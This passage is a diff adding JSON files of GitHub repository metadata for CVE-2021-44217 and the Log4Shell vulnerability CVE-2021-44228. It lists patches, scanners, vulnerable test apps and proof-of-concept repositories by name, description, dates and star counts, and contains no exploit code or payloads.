"forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44217.json b/2021/CVE-2021-44217.json new file mode 100644 index 0000000000..8177288e6d --- /dev/null +++ b/2021/CVE-2021-44217.json @@ -0,0 +1,33 @@ +[ + { + "id": 431676694, + "name": "CVE-2021-44217", + "full_name": "Hyperkopite\/CVE-2021-44217", + "owner": { + "login": "Hyperkopite", + "id": 9525971, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9525971?v=4", + "html_url": "https:\/\/github.com\/Hyperkopite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hyperkopite\/CVE-2021-44217", + "description": null, + "fork": false, + "created_at": "2021-11-25T01:24:58Z", + "updated_at": "2021-11-25T05:02:36Z", + "pushed_at": "2022-02-26T18:38:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44228.json b/2021/CVE-2021-44228.json new file mode 100644 index 0000000000..d82201b898 --- /dev/null +++ b/2021/CVE-2021-44228.json @@ -0,0 +1,12848 @@ +[ + { + "id": 436666301, + "name": "CVE-2021-44228-Apache-Log4j-Rce", + "full_name": "tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce", + "description": "Apache Log4j 远程代码执行", + "fork": false, + "created_at": "2021-12-09T15:27:38Z", + "updated_at": "2024-11-02T09:32:11Z", + "pushed_at": "2023-05-14T04:54:32Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 75, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 436771097, + "name": "Healer", + "full_name": "Glease\/Healer", + "owner": { + "login": "Glease", + "id": 4586901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4586901?v=4", + "html_url": "https:\/\/github.com\/Glease", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Glease\/Healer", + "description": "Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2", + "fork": false, + "created_at": "2021-12-09T21:49:33Z", + "updated_at": "2024-11-07T13:23:14Z", + "pushed_at": "2023-01-27T17:34:36Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 436798675, + "name": "L4J-Vuln-Patch", + "full_name": "jacobtread\/L4J-Vuln-Patch", + "owner": { + "login": "jacobtread", + "id": 33708767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33708767?v=4", + "html_url": "https:\/\/github.com\/jacobtread", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jacobtread\/L4J-Vuln-Patch", + "description": "This tool patches the CVE-2021-44228 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN after downloading or updating versions of minecraft as its not a perminent patch", + "fork": false, + "created_at": "2021-12-10T00:14:06Z", + "updated_at": "2023-08-17T23:00:04Z", + "pushed_at": "2021-12-15T03:10:47Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436860437, + "name": "Log4j2-CVE-2021-44228", + "full_name": "jas502n\/Log4j2-CVE-2021-44228", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/Log4j2-CVE-2021-44228", + "description": "Remote Code Injection In Log4j", + "fork": false, + "created_at": "2021-12-10T05:23:44Z", + "updated_at": "2024-11-25T03:42:23Z", + "pushed_at": "2022-01-18T12:01:52Z", + "stargazers_count": 459, + "watchers_count": 459, + "has_discussions": false, + "forks_count": 124, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 124, + "watchers": 459, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 436871682, + "name": "Log4J-RCE-Proof-Of-Concept", + "full_name": "HyCraftHD\/Log4J-RCE-Proof-Of-Concept", + "owner": { + "login": "HyCraftHD", + "id": 7681220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7681220?v=4", + "html_url": "https:\/\/github.com\/HyCraftHD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HyCraftHD\/Log4J-RCE-Proof-Of-Concept", + "description": "Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information", + "fork": false, + "created_at": "2021-12-10T06:15:38Z", + "updated_at": "2024-08-12T20:18:43Z", + "pushed_at": "2021-12-16T01:33:48Z", + "stargazers_count": 179, + "watchers_count": 179, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-44228", + "cves", + "exploit", + "log4j", + "log4j2", + "minecraft" + ], + "visibility": "public", + "forks": 31, + "watchers": 179, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 436877979, + "name": "cloudrasp-log4j2", + "full_name": "boundaryx\/cloudrasp-log4j2", + "owner": { + "login": "boundaryx", + "id": 95878655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95878655?v=4", + "html_url": "https:\/\/github.com\/boundaryx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/boundaryx\/cloudrasp-log4j2", + "description": "一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.", + "fork": false, + "created_at": "2021-12-10T06:42:37Z", + "updated_at": "2024-10-15T07:29:44Z", + "pushed_at": "2021-12-11T02:49:41Z", + "stargazers_count": 122, + "watchers_count": 122, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "defense", + "hardening", + "java", + "log4j", + "log4j2", + "protection", + "rasp", + "rce", + "security", + "security-tools", + "vulnerability" + ], + "visibility": "public", + "forks": 20, + "watchers": 122, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 436881928, + "name": "CVE-2021-44228", + "full_name": "dbgee\/CVE-2021-44228", + "owner": { + "login": "dbgee", + "id": 46910972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4", + "html_url": "https:\/\/github.com\/dbgee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbgee\/CVE-2021-44228", + "description": "Apache Log4j 2 a remote code execution vulnerability via the ldap JNDI parser.", + "fork": false, + "created_at": "2021-12-10T06:59:10Z", + "updated_at": "2022-11-09T18:14:39Z", + "pushed_at": "2022-01-19T09:58:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436918458, + "name": "Log4jPatcher", + "full_name": "CreeperHost\/Log4jPatcher", + "owner": { + "login": "CreeperHost", + "id": 7502613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7502613?v=4", + "html_url": "https:\/\/github.com\/CreeperHost", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CreeperHost\/Log4jPatcher", + "description": "A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)", + "fork": false, + "created_at": "2021-12-10T09:16:46Z", + "updated_at": "2024-06-28T10:26:36Z", + "pushed_at": "2022-11-10T11:16:17Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4j2", + "log4shell" + ], + "visibility": "public", + "forks": 6, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 436919597, + "name": "RCE", + "full_name": "DragonSurvivalEU\/RCE", + "owner": { + "login": "DragonSurvivalEU", + "id": 92676019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92676019?v=4", + "html_url": "https:\/\/github.com\/DragonSurvivalEU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DragonSurvivalEU\/RCE", + "description": "CVE-2021-44228 fix", + "fork": false, + "created_at": "2021-12-10T09:20:40Z", + "updated_at": "2024-08-12T20:18:43Z", + "pushed_at": "2021-12-20T00:38:10Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436933689, + "name": "Log4jPatch", + "full_name": "simonis\/Log4jPatch", + "owner": { + "login": "simonis", + "id": 3178197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3178197?v=4", + "html_url": "https:\/\/github.com\/simonis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simonis\/Log4jPatch", + "description": "Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process", + "fork": false, + "created_at": "2021-12-10T10:10:19Z", + "updated_at": "2024-06-06T03:59:54Z", + "pushed_at": "2021-12-12T10:33:02Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 108, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 436973468, + "name": "CVE-2021-44228-Test-Server", + "full_name": "zlepper\/CVE-2021-44228-Test-Server", + "owner": { + "login": "zlepper", + "id": 1499810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1499810?v=4", + "html_url": "https:\/\/github.com\/zlepper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zlepper\/CVE-2021-44228-Test-Server", + "description": "A small server for verifing if a given java program is succeptibel to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-10T12:35:30Z", + "updated_at": "2023-08-04T05:22:46Z", + "pushed_at": "2021-12-10T12:39:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 436974241, + "name": "log4shell-vulnerable-app", + "full_name": "christophetd\/log4shell-vulnerable-app", + "owner": { + "login": "christophetd", + "id": 136675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136675?v=4", + "html_url": "https:\/\/github.com\/christophetd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/christophetd\/log4shell-vulnerable-app", + "description": "Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).", + "fork": false, + "created_at": "2021-12-10T12:38:20Z", + "updated_at": "2024-11-28T14:30:03Z", + "pushed_at": "2024-04-26T03:16:26Z", + "stargazers_count": 1108, + "watchers_count": 1108, + "has_discussions": false, + "forks_count": 536, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4shell" + ], + "visibility": "public", + "forks": 536, + "watchers": 1108, + "score": 0, + "subscribers_count": 23 + }, + { + "id": 437005376, + "name": "log4jcheck", + "full_name": "NorthwaveSecurity\/log4jcheck", + "owner": { + "login": "NorthwaveSecurity", + "id": 44571169, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44571169?v=4", + "html_url": "https:\/\/github.com\/NorthwaveSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NorthwaveSecurity\/log4jcheck", + "description": "A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers.", + "fork": false, + "created_at": "2021-12-10T14:22:49Z", + "updated_at": "2024-11-22T12:39:18Z", + "pushed_at": "2021-12-14T15:16:15Z", + "stargazers_count": 125, + "watchers_count": 125, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2021-44228", + "log4j", + "log4shell", + "rce", + "scanner" + ], + "visibility": "public", + "forks": 26, + "watchers": 125, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 437026730, + "name": "VictimApp", + "full_name": "nkoneko\/VictimApp", + "owner": { + "login": "nkoneko", + "id": 1922341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1922341?v=4", + "html_url": "https:\/\/github.com\/nkoneko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nkoneko\/VictimApp", + "description": "Vulnerable to CVE-2021-44228. trustURLCodebase is not required.", + "fork": false, + "created_at": "2021-12-10T15:32:03Z", + "updated_at": "2022-11-09T18:14:41Z", + "pushed_at": "2021-12-10T22:40:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437031223, + "name": "pulsar-docker-images-patch-CVE-2021-44228", + "full_name": "lhotari\/pulsar-docker-images-patch-CVE-2021-44228", + "owner": { + "login": "lhotari", + "id": 66864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864?v=4", + "html_url": "https:\/\/github.com\/lhotari", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhotari\/pulsar-docker-images-patch-CVE-2021-44228", + "description": "Patch Pulsar Docker images with Log4J 2.17.1 update to mitigate Apache Log4J Security Vulnerabilities including Log4Shell", + "fork": false, + "created_at": "2021-12-10T15:46:49Z", + "updated_at": "2024-08-24T16:05:13Z", + "pushed_at": "2022-01-13T06:40:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "docker", + "log4shell" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437034295, + "name": "Apache-Log4j2-RCE", + "full_name": "1in9e\/Apache-Log4j2-RCE", + "owner": { + "login": "1in9e", + "id": 15817052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15817052?v=4", + "html_url": "https:\/\/github.com\/1in9e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1in9e\/Apache-Log4j2-RCE", + "description": "Apache Log4j2 RCE( CVE-2021-44228)验证环境", + "fork": false, + "created_at": "2021-12-10T15:57:14Z", + "updated_at": "2024-08-12T20:18:44Z", + "pushed_at": "2021-12-10T15:58:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "bugbounty", + "cve-2021-44228", + "java", + "log4j2", + "rce", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437056774, + "name": "CVE-2021-44228-example", + "full_name": "KosmX\/CVE-2021-44228-example", + "owner": { + "login": "KosmX", + "id": 15692868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15692868?v=4", + "html_url": "https:\/\/github.com\/KosmX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KosmX\/CVE-2021-44228-example", + "description": "vulnerability POC", + "fork": false, + "created_at": "2021-12-10T17:13:18Z", + "updated_at": "2023-08-15T12:50:54Z", + "pushed_at": "2021-12-17T17:16:30Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-44228", + "rce" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437060009, + "name": "CVE-2021-44228", + "full_name": "greymd\/CVE-2021-44228", + "owner": { + "login": "greymd", + "id": 3874767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3874767?v=4", + "html_url": "https:\/\/github.com\/greymd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greymd\/CVE-2021-44228", + "description": "Vulnerability CVE-2021-44228 checker", + "fork": false, + "created_at": "2021-12-10T17:24:47Z", + "updated_at": "2024-08-12T20:18:44Z", + "pushed_at": "2021-12-13T15:16:23Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437071396, + "name": "CVE-2021-44228-Log4Shell-Hashes", + "full_name": "mubix\/CVE-2021-44228-Log4Shell-Hashes", + "owner": { + "login": "mubix", + "id": 679319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/679319?v=4", + "html_url": "https:\/\/github.com\/mubix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mubix\/CVE-2021-44228-Log4Shell-Hashes", + "description": "Hashes for vulnerable LOG4J versions", + "fork": false, + "created_at": "2021-12-10T18:06:06Z", + "updated_at": "2024-08-12T20:18:44Z", + "pushed_at": "2021-12-17T17:02:24Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 154, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 437091396, + "name": "mc-log4j-patcher", + "full_name": "OopsieWoopsie\/mc-log4j-patcher", + "owner": { + "login": "OopsieWoopsie", + "id": 15069175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15069175?v=4", + "html_url": "https:\/\/github.com\/OopsieWoopsie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OopsieWoopsie\/mc-log4j-patcher", + "description": "CVE-2021-44228 server-side fix for minecraft servers.", + "fork": false, + "created_at": "2021-12-10T19:25:31Z", + "updated_at": "2023-11-08T22:32:59Z", + "pushed_at": "2021-12-10T19:47:45Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "fix", + "log4j2", + "minecraft", + "paper", + "spigot" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437097787, + "name": "CVE-2021-44228-kusto", + "full_name": "wheez-y\/CVE-2021-44228-kusto", + "owner": { + "login": "wheez-y", + "id": 77060088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77060088?v=4", + "html_url": "https:\/\/github.com\/wheez-y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wheez-y\/CVE-2021-44228-kusto", + "description": null, + "fork": false, + "created_at": "2021-12-10T19:53:32Z", + "updated_at": "2021-12-10T19:55:16Z", + "pushed_at": "2021-12-10T19:55:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437108119, + "name": "log4shell-mitigation", + "full_name": "izzyacademy\/log4shell-mitigation", + "owner": { + "login": "izzyacademy", + "id": 44282278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44282278?v=4", + "html_url": "https:\/\/github.com\/izzyacademy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/izzyacademy\/log4shell-mitigation", + "description": "Mitigation for Log4Shell Security Vulnerability CVE-2021-44228 ", + "fork": false, + "created_at": "2021-12-10T20:39:56Z", + "updated_at": "2021-12-11T16:21:03Z", + "pushed_at": "2021-12-11T16:21:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437116864, + "name": "CVE-2021-44228-poc", + "full_name": "Kadantte\/CVE-2021-44228-poc", + "owner": { + "login": "Kadantte", + "id": 11579313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11579313?v=4", + "html_url": "https:\/\/github.com\/Kadantte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kadantte\/CVE-2021-44228-poc", + "description": "log4shell sample application (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-10T21:20:05Z", + "updated_at": "2021-12-10T21:20:06Z", + "pushed_at": "2021-12-10T21:15:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437122153, + "name": "log4j-detect", + "full_name": "takito1812\/log4j-detect", + "owner": { + "login": "takito1812", + "id": 56491288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56491288?v=4", + "html_url": "https:\/\/github.com\/takito1812", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takito1812\/log4j-detect", + "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading", + "fork": false, + "created_at": "2021-12-10T21:46:18Z", + "updated_at": "2024-10-27T02:07:47Z", + "pushed_at": "2021-12-13T22:27:25Z", + "stargazers_count": 195, + "watchers_count": 195, + "has_discussions": false, + "forks_count": 57, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 57, + "watchers": 195, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 437124793, + "name": "log4noshell", + "full_name": "winnpixie\/log4noshell", + "owner": { + "login": "winnpixie", + "id": 31022473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31022473?v=4", + "html_url": "https:\/\/github.com\/winnpixie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/winnpixie\/log4noshell", + "description": "A Java Agent that disables Apache Log4J's JNDI Lookup to mitigate CVE-2021-44228 (\"Log4Shell\").", + "fork": false, + "created_at": "2021-12-10T21:59:31Z", + "updated_at": "2024-10-30T09:59:36Z", + "pushed_at": "2024-10-30T09:59:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "log4j", + "patch", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437128632, + "name": "CVE-2021-44228-DFIR-Notes", + "full_name": "Azeemering\/CVE-2021-44228-DFIR-Notes", + "owner": { + "login": "Azeemering", + "id": 31852867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31852867?v=4", + "html_url": "https:\/\/github.com\/Azeemering", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Azeemering\/CVE-2021-44228-DFIR-Notes", + "description": "CVE-2021-44228 DFIR Notes", + "fork": false, + "created_at": "2021-12-10T22:19:16Z", + "updated_at": "2024-08-12T20:18:45Z", + "pushed_at": "2021-12-14T12:15:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437131550, + "name": "CVE-2021-44228-PoC-log4j-bypass-words", + "full_name": "Puliczek\/CVE-2021-44228-PoC-log4j-bypass-words", + "owner": { + "login": "Puliczek", + "id": 12344862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12344862?v=4", + "html_url": "https:\/\/github.com\/Puliczek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Puliczek\/CVE-2021-44228-PoC-log4j-bypass-words", + "description": "🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks", + "fork": false, + "created_at": "2021-12-10T22:35:00Z", + "updated_at": "2024-11-25T03:42:18Z", + "pushed_at": "2022-01-15T16:18:44Z", + "stargazers_count": 934, + "watchers_count": 934, + "has_discussions": false, + "forks_count": 142, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounttips", + "bugbounty", + "bugbounty-writeups", + "cve", + "cve-2021-44228", + "cve-2021-45046", + "cve-2021-45105", + "cybersecurity", + "exploit", + "hacking", + "log4j", + "payload", + "pentest", + "pentesting", + "poc", + "red-team", + "security", + "security-writeups", + "writeups" + ], + "visibility": "public", + "forks": 142, + "watchers": 934, + "score": 0, + "subscribers_count": 25 + }, + { + "id": 437139341, + "name": "log4j-shell-poc", + "full_name": "kozmer\/log4j-shell-poc", + "owner": { + "login": "kozmer", + "id": 87979263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87979263?v=4", + "html_url": "https:\/\/github.com\/kozmer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kozmer\/log4j-shell-poc", + "description": "A Proof-Of-Concept for the CVE-2021-44228 vulnerability. ", + "fork": false, + "created_at": "2021-12-10T23:19:28Z", + "updated_at": "2024-11-26T17:19:35Z", + "pushed_at": "2024-02-12T22:37:25Z", + "stargazers_count": 1810, + "watchers_count": 1810, + "has_discussions": false, + "forks_count": 527, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "java", + "log4j", + "security" + ], + "visibility": "public", + "forks": 527, + "watchers": 1810, + "score": 0, + "subscribers_count": 26 + }, + { + "id": 437141854, + "name": "cve-2021-44228-workaround-buildpack", + "full_name": "alexandreroman\/cve-2021-44228-workaround-buildpack", + "owner": { + "login": "alexandreroman", + "id": 665131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/665131?v=4", + "html_url": "https:\/\/github.com\/alexandreroman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexandreroman\/cve-2021-44228-workaround-buildpack", + "description": "Buildpack providing a workaround for CVE-2021-44228 (Log4j RCE exploit)", + "fork": false, + "created_at": "2021-12-10T23:34:52Z", + "updated_at": "2022-10-06T19:08:01Z", + "pushed_at": "2021-12-10T23:47:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437141974, + "name": "minecraft-log4j-honeypot", + "full_name": "Adikso\/minecraft-log4j-honeypot", + "owner": { + "login": "Adikso", + "id": 1407751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1407751?v=4", + "html_url": "https:\/\/github.com\/Adikso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Adikso\/minecraft-log4j-honeypot", + "description": "Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam", + "fork": false, + "created_at": "2021-12-10T23:35:31Z", + "updated_at": "2024-09-02T19:21:15Z", + "pushed_at": "2021-12-14T13:43:35Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "log4j", + "minecraft" + ], + "visibility": "public", + "forks": 20, + "watchers": 101, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437142312, + "name": "CVE-2021-44228", + "full_name": "racoon-rac\/CVE-2021-44228", + "owner": { + "login": "racoon-rac", + "id": 64579294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64579294?v=4", + "html_url": "https:\/\/github.com\/racoon-rac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/racoon-rac\/CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-10T23:37:55Z", + "updated_at": "2021-12-11T01:11:19Z", + "pushed_at": "2023-08-29T19:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + 